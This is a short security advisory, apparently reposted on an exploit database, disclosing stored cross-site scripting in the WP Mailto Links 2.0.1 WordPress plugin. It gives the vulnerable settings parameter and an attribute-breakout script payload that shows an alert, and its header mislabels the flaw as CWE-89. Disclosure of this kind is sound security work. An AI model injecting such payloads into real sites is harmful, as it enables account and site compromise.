WordPress WP Mailto Links 2.0.1 - Stored Cross Site Scripting

2016.03.12
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

================================================================================ # WordPress WP Mailto Links 2.0.1 - Stored Cross Site Scripting ================================================================================ # Author: Ehsan Hosseini # Vendor Homepage: https://wordpress.org/plugins/wp-mailto-links/ # Software Link : https://downloads.wordpress.org/plugin/wp-mailto-links.2.0.1.zip # Version : 2.0.1 # Date: 12/03/2016 # Contact: hehsan979@gmail.com # Source: http://ehsansec.ir/advisories/wpmailtolinks-xss.txt ================================================================================ # Vulnerability Details : Type : Stored XSS Minimum Level of Access Required : Change Plugin Values. # PoC : In the following field put the payload as below http://localhost/wordpress/wp-admin/options-general.php?page=wp-mailto-links-option-page Vulnerable Parameter : wp-mailto-links[no_icon_class] = "><script>alert('Ehsan Cod3r')</script> ================================================================================ # Ya Fateme! In Roza Hassan Ye Ghoshe Kez Karde ! In Roza Kasi Az Hal Emam Zaman Khabar Nadre ! Vay Madaram! ================================================================================ # Discovered By : Ehsan Hosseini (EhsanSec.ir) ================================================================================

References:

http://EhsanSec.ir


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top